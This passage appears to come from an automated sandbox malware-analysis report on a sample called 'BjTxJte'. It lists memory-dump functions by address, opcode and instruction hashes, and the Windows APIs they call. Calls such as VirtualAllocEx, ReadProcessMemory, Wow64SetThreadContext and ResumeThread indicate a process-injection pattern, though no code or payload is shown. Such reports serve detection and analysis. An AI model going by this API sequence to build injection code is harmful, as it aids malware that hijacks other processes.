Opcode Fuzzy Hash: 7fac0ecb62a5d0bdc687a938752110c1272d47cbb026b69b37e8a4f060302c95
Instruction Fuzzy Hash: 61212871D003098FDB10DFA9C4857AEBBF4AF88324F24842AD559A7240CB789545CF61

Uniqueness

Uniqueness Score: -1.00%

Function 068DF788 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068DF808

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 747636b090ce9eea4ac872a15abc6c9cc7eefb16848775f84300af083544c93f
Instruction ID: a78e4f3b136c8489635ea8639c2a52d4bbf9e8c78f180fe932519b277e737ff8
Opcode Fuzzy Hash: 747636b090ce9eea4ac872a15abc6c9cc7eefb16848775f84300af083544c93f
Instruction Fuzzy Hash: 662139B1D003499FCB10CFAAC981ADEFBF5FF48320F10842AE519A7240C7799500DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DEC90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068DED0E

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 41bbb63a332fa521d6d93d0653366ed9de64f42f80269c95c6141e3200c82ab0
Instruction ID: de060dd6be116c8ed46c936313618246d2d90b205b63dca8b08e5b138d9791c0
Opcode Fuzzy Hash: 41bbb63a332fa521d6d93d0653366ed9de64f42f80269c95c6141e3200c82ab0
Instruction Fuzzy Hash: 7E212C71D003098FDB10DFAAC5857EEBBF4EF88324F148429D519A7240DB789545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 007DD5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007DD647

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7749a8ed819cb0e792dda4afbcfa581eef5e3c4545913287bdb57d94a541af70
Instruction ID: 971c4c17349148ed6dcf889f298e6a4fff623679353c81928375ffceadf973b0
Opcode Fuzzy Hash: 7749a8ed819cb0e792dda4afbcfa581eef5e3c4545913287bdb57d94a541af70
Instruction Fuzzy Hash: 1521E4B59002489FDB10CF9AD984ADEBBF8EB48320F14841AE918A3350D378A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 068DF19C Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068DF20E

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 03f9a9095c14849dd1e6482b5ccf4bef98e374ba35abf28d03438a7929332960
Instruction ID: eb4fe0061f9fd2652b5ab2ee77634a3752d3663fdd79891037e4bc4358652081
Opcode Fuzzy Hash: 03f9a9095c14849dd1e6482b5ccf4bef98e374ba35abf28d03438a7929332960
Instruction Fuzzy Hash: EF113A75D002499FCF20CFA9D845AEEBFF5EF88324F24881AE519A7250C7759540DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007DA0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007DAFB9,00000800,00000000,00000000), ref: 007DB1CA

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 591f1eeacf58607b7c7f0a054c2975b32106c8e29c066ab2af011aa2a985e4b5
Instruction ID: b54c9082c9271ce2b304383750f59289c81af75bad752d7177e1925b982858b8
Opcode Fuzzy Hash: 591f1eeacf58607b7c7f0a054c2975b32106c8e29c066ab2af011aa2a985e4b5
Instruction Fuzzy Hash: 921114B6900309CFDB20CF9AC844A9EFBF4EB88310F10842EE419A7300C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 007DB159 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007DAFB9,00000800,00000000,00000000), ref: 007DB1CA

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ba53cf7b66c7b391719123ec04adfbc6304daade62641f8db59d9317c2568f51
Instruction ID: 584c771a8ca5914f26d90f4dd7ddeadb1514ee2ec3a9346335b87f5261a9edd4
Opcode Fuzzy Hash: ba53cf7b66c7b391719123ec04adfbc6304daade62641f8db59d9317c2568f51
Instruction Fuzzy Hash: B71114B6900249CFDB10CF9AC844A9EFBF4EB88310F14842ED819A7300C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 068DF1A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068DF20E

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eb6aa3c59ebb0a8d11d09f2330d7f6d51a89ef0a24c16527480ef734c219a895
Instruction ID: 3851ee161c433a388b21e1364578e96d3276d476d62b9078e3e82a55f3633f0a
Opcode Fuzzy Hash: eb6aa3c59ebb0a8d11d09f2330d7f6d51a89ef0a24c16527480ef734c219a895
Instruction Fuzzy Hash: 601137759002499FCB20DFAAC845ADEBFF5EF88324F248819E519A7250C775A540DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DEBD8 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 068DEC42

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6b0f3b29f699660d67913d21c45c08a8efd7b9466f91bf712590b3e2983e04bc
Instruction ID: e4727c670bd4b424e4084352946fd98073eaaa3981e8b154717d165f6fca3ccc
Opcode Fuzzy Hash: 6b0f3b29f699660d67913d21c45c08a8efd7b9466f91bf712590b3e2983e04bc
Instruction Fuzzy Hash: 3E1146B1D003498EDB24DFAAC8497AEFFF5AF98324F24841AD519A7240CB796544CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 068DEBE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 068DEC42

Memory Dump Source

Source File: 00000010.00000002.1860842488.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d0000_BjTxJte.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94361c52a11a8500427f034c69d819716394541b3ec1d52f12d6cbc568f579fc
Instruction ID: 8d9fff8d4157fe9e6a3936a1c5e46313c95058ff04605e3e653084718ac4e5c2
Opcode Fuzzy Hash: 94361c52a11a8500427f034c69d819716394541b3ec1d52f12d6cbc568f579fc
Instruction Fuzzy Hash: 50116AB1D003498FDB20DFAAC44579EFFF4EF88320F248419D519A7240C779A504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007DAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 007DAF3E

Memory Dump Source

Source File: 00000010.00000002.1853445401.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7d0000_BjTxJte.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6bcf353016877e2767525299fb8b47af2b317b4246808c7c4000716010aac0d4
Instruction ID: d8ac5e312e678bdf6832a92aaa895e859c9d8de2c687c20f5b818737dfd9da82
Opcode Fuzzy Hash: 6bcf353016877e2767525299fb8b47af2b317b4246808c7c4000716010aac0d4
Instruction Fuzzy Hash: BA110FB6C002498FCB20CF9AC444A9EFBF4EB88324F20846AD418A7300C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A94CEC Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Hjq, xrefs: 04A96F0E

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: Hjq
API String ID: 0-3368716452
Opcode ID: 46b29919a9c27defa2a1861f7a6975683bbfb98eade09bdc5ff0e92ad5507e5e
Instruction ID: 0b6093929e2e341654a6f934d17cd6b265013366f6d29b9a61c250415797f948
Opcode Fuzzy Hash: 46b29919a9c27defa2a1861f7a6975683bbfb98eade09bdc5ff0e92ad5507e5e
Instruction Fuzzy Hash: 71413DB5A002089FDB14DFA9C444AAEBBF5EF88310F108469E54AA7750DB35AD46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A9B910 Relevance: .7, Instructions: 733COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9243b4dbabcf2444c9e05d032a76d9a14b77a4a9987bca43d35bb8b4f33f3f1f
Instruction ID: a41f3a621a03de3689e98d56e74126190714e783fad7861773847d0eb63d82b6
Opcode Fuzzy Hash: 9243b4dbabcf2444c9e05d032a76d9a14b77a4a9987bca43d35bb8b4f33f3f1f
Instruction Fuzzy Hash: 74722B31910619CFDB14EF68D8986ADBBF1FF45304F0082A9D549AB265EB34AEC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04A98890 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99101bf563884fe4b68f1c817ba90378378fe904130e4c8ecd947e15bc0967f1
Instruction ID: 045ca806a44723e28c8c1a8b6d31c08fad187352485039a785f6cdd0d441e486
Opcode Fuzzy Hash: 99101bf563884fe4b68f1c817ba90378378fe904130e4c8ecd947e15bc0967f1
Instruction Fuzzy Hash: D042E431E106198BDF14EF68C9846EDB7F1BF89304F1186A9D459BB261EB34AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04A9D5A8 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e113b15b6294c839571f7b91f85e0cc2ea02b0e638be9bd52e753e434e0cbfad
Instruction ID: 07657118d5f4d8cb434c8a00d7745bab3c860b611097e6614fb1b7548c708aab
Opcode Fuzzy Hash: e113b15b6294c839571f7b91f85e0cc2ea02b0e638be9bd52e753e434e0cbfad
Instruction Fuzzy Hash: 0A221534A10215CFDB14EF68C994A9DB7F2FF89304F1486A9E50AAB365DB30AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A98881 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bf38d2a5b42f85f92077facb49d9205e13e2f9ce4e53f76ebc216c090ce377
Instruction ID: 2bad42acb554fa97d5998343a07db747028839f227c7bc21693be44a44dd1196
Opcode Fuzzy Hash: 06bf38d2a5b42f85f92077facb49d9205e13e2f9ce4e53f76ebc216c090ce377
Instruction Fuzzy Hash: ABE1F731E106198FDF24EF68C9846EDB7F1BF49304F1586A9D419AB261EB34AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04A9D1E0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fe21e230b695e02d5319a1e9333cd1c6cd48b77018eca00d4e9ee0d79fcedc
Instruction ID: 941ddb8660eb156bdf360477d3a4d9c311a0da15414058b0e4b3f055f6592946
Opcode Fuzzy Hash: a0fe21e230b695e02d5319a1e9333cd1c6cd48b77018eca00d4e9ee0d79fcedc
Instruction Fuzzy Hash: ACC10334A10619CFCF14DF69C984A9DB7F1FF89304F1186A9E449AB221EB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A9D1D0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a00d7a90b7cba7ed28037bcfc56739ceffb567f6d65e3ad91db68a7ae0efdae
Instruction ID: 47c3d4fd00afcdc268874d09015829d86aa70b6f8a909bf51ff33ce3531f3c04
Opcode Fuzzy Hash: 1a00d7a90b7cba7ed28037bcfc56739ceffb567f6d65e3ad91db68a7ae0efdae
Instruction Fuzzy Hash: D8A1F634A10619CFCB14DF68C884A9DFBF1FF89314F1586A9D449AB221EB70AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04A9B2A0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32f9f0a276be6d74be6ae1af8a5fe3d0be4621fd67efa5625d66f3b30e0c3ed
Instruction ID: 09949d1b958416df25dd7259009d5a47f61a9febce56f8d3cf9ce70192d8005a
Opcode Fuzzy Hash: e32f9f0a276be6d74be6ae1af8a5fe3d0be4621fd67efa5625d66f3b30e0c3ed
Instruction Fuzzy Hash: C491F67190060ACFCB01EF68D880999FBF5FF89310B14C79AE919AB255E774ED85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A9A621 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8800f7bf7eba2fd98b0632669158d74b2ce82142269ef1af7bab723db9634b8e
Instruction ID: 5cb0afd5f60106227a1210bd9861bccf0cf6605d1c1a313e24ecee0746d0a956
Opcode Fuzzy Hash: 8800f7bf7eba2fd98b0632669158d74b2ce82142269ef1af7bab723db9634b8e
Instruction Fuzzy Hash: 5371CEB5700A418FCB18DF29C598959BBF2FF8930471589A9E54ACB372DB72EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A9DC90 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3baa27a704bb9461184b6aeefce9f1e991779866e39a0b25f03c5f17c338d260
Instruction ID: dd2cb5d61338ae3b3b89d8689d8e1b45d65e5dcc5541ce58b921ff737af964e6
Opcode Fuzzy Hash: 3baa27a704bb9461184b6aeefce9f1e991779866e39a0b25f03c5f17c338d260
Instruction Fuzzy Hash: 905138347012148FDF19DF68C894AAE7BF6BF89714B1844A9D406EB361DB39EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A9A440 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3eb346f8f9ced2f118726e23b0fb756678d6a25c8616b8a6fc24cb5ec7ffa1
Instruction ID: 810af4b268baf2323bd1b17b00289a735c2ff6a7d8e1b57b7ffb8fbb064987bd
Opcode Fuzzy Hash: 0b3eb346f8f9ced2f118726e23b0fb756678d6a25c8616b8a6fc24cb5ec7ffa1
Instruction Fuzzy Hash: 04719C74A042468FCB44CF69D584999FBF1FF48314B4986AAE80ADB312E734EC85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04A9D598 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b12f5acb5fa06a921b39ff4868cc090d9a317c9adfe1d7acb2d4864c1bdb0f
Instruction ID: 6736ed3fbcf2f6e446bc7766ffc81e00ae44d3ddeeded439752b5efec0407282
Opcode Fuzzy Hash: 90b12f5acb5fa06a921b39ff4868cc090d9a317c9adfe1d7acb2d4864c1bdb0f
Instruction Fuzzy Hash: 575127306106008FDB14EF69C894B9D77F2BF89314F148AB8E54A9B3A5DB71AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A9EBA8 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3d8929821c74e01317400643fc309fd855f63407ab8e8103e45354a16a50ff
Instruction ID: eee163689c53d25837583ab1c940f7fd07510c1e57b224f9a050d0f923c121a1
Opcode Fuzzy Hash: 1c3d8929821c74e01317400643fc309fd855f63407ab8e8103e45354a16a50ff
Instruction Fuzzy Hash: 89711B30A10219CFDB04DBE4C994AEEB7F2FF88304F158665D5056B2AAEB70BD45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04A94330 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3a869d236f5974fa2e34789866ecb00c35514a70459918542e230b0180d3b8
Instruction ID: c1578476d908d1d6170a92379dccde718e61d967cf1529ecdad80493ada010f9
Opcode Fuzzy Hash: 9d3a869d236f5974fa2e34789866ecb00c35514a70459918542e230b0180d3b8
Instruction Fuzzy Hash: 95518375E002459FDF14DFA9C944AAFBBF5EF98310F10841AD515E7240DB74AD06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A9B291 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd50eb08c245b22938beaebbeb78ab9075fb2124ab319e73cc3cf8df1101595
Instruction ID: 38b31e6f709137ee453a51d99620275c4880fd91c74ea9f484e920183c750393
Opcode Fuzzy Hash: abd50eb08c245b22938beaebbeb78ab9075fb2124ab319e73cc3cf8df1101595
Instruction Fuzzy Hash: 6761F77191070ACFCB41EF68C880999FBF0FF89310B14875AE859EB255EB74E985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A94D24 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601f7e82491d5a173c28bab567ee95831072170def99f9377e2108e5a1c88240
Instruction ID: f49d2094ebb03c55367618f2af4ed868855401e86e5d1061b9824cef2c37b88f
Opcode Fuzzy Hash: 601f7e82491d5a173c28bab567ee95831072170def99f9377e2108e5a1c88240
Instruction Fuzzy Hash: 76316A30A02219EFDF18DFA4E5945ADBBF2FF89305F21845AE45267291CB35AC66CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04A91220 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257d264452c1714cf2a0d6fe7d965da69519a17bb73ad1d35bfde6a6f2d9e1db
Instruction ID: 1d3a566d12671bb8696033d260af459486f2c5bf7125f0aaeb440faf064f3241
Opcode Fuzzy Hash: 257d264452c1714cf2a0d6fe7d965da69519a17bb73ad1d35bfde6a6f2d9e1db
Instruction Fuzzy Hash: 02414A75A0021ACFEF15EFA9D944AEEBBF1AB48310F144125D845FB350EB34AD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A90040 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859b687c133af73dea718b1357aec6b7c6bba699a9689b5412dbd9714f52e407
Instruction ID: 2b2037782a623a93bd85f7d9186a40678f13d13c6f596055fb7bd0c726eefcbc
Opcode Fuzzy Hash: 859b687c133af73dea718b1357aec6b7c6bba699a9689b5412dbd9714f52e407
Instruction Fuzzy Hash: B2411830B05219EFDF19DFA8D9846AEB7F2AF48304F104529E506EB360EB75AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A99518 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05500e533c81adfd2043f64521c24c98baf11ebd5f0b611721207cdd40412221
Instruction ID: f7c44c4ceb10f7041b57b52396a42baca3e918099227f2799eda2370e1565df2
Opcode Fuzzy Hash: 05500e533c81adfd2043f64521c24c98baf11ebd5f0b611721207cdd40412221
Instruction Fuzzy Hash: C2413D30A10709CFDB04EF78C99499DBBB6FF89304F108569E515AB335EB71A946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04A953F4 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805c2e96d72a56dcd92d35a5414dad1034c32f23d38d050b9cf7719d742a0533
Instruction ID: 172bb9535a289a5dbea1cbdead4f5c457e1f000bd870e75d7ad0821d8315609c
Opcode Fuzzy Hash: 805c2e96d72a56dcd92d35a5414dad1034c32f23d38d050b9cf7719d742a0533
Instruction Fuzzy Hash: 8941B1B1D012099BDF20DFA9C585ACEFBF5BF48314F648429D408BB215D7756A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 04A99528 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8358604761649fdb34034f786dd9593ea25f7997d32fceb232d76cb63c4f427
Instruction ID: 9e76bcbcf03946a65b0541e255971b35a2bff850a3902d8b792d21b57aaf4a6b
Opcode Fuzzy Hash: b8358604761649fdb34034f786dd9593ea25f7997d32fceb232d76cb63c4f427
Instruction Fuzzy Hash: D3412C30A10709CFCB04EF68C99499DBBB6FF89304F108569E515AB325EB71A946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04A90006 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fceceace29942f932ca4c9c7d75fa99ae039da871329e65641a4993dd4b7055e
Instruction ID: e5c038410b19567cca7d8267f3666e8a06102d3cb0f955269fc747b2199f5321
Opcode Fuzzy Hash: fceceace29942f932ca4c9c7d75fa99ae039da871329e65641a4993dd4b7055e
Instruction Fuzzy Hash: FA310371E093449FDF16CF74D99469DBBF1AF4A304F1540AAE441DB2A2EB34AC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A97297 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f53f32f4661e4e3a6cdc0df7a1421d488fab2c9c3229ca778769262a85841f0
Instruction ID: ad5fbc7191de0ca379e17fbfd85b43b0ac60ac957bea85504386f7d05670c62a
Opcode Fuzzy Hash: 7f53f32f4661e4e3a6cdc0df7a1421d488fab2c9c3229ca778769262a85841f0
Instruction Fuzzy Hash: 2541D77590020ADFDB40DF68D88499EFBF5FF49314B14C6A9E818EB321E730A985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A9A42F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
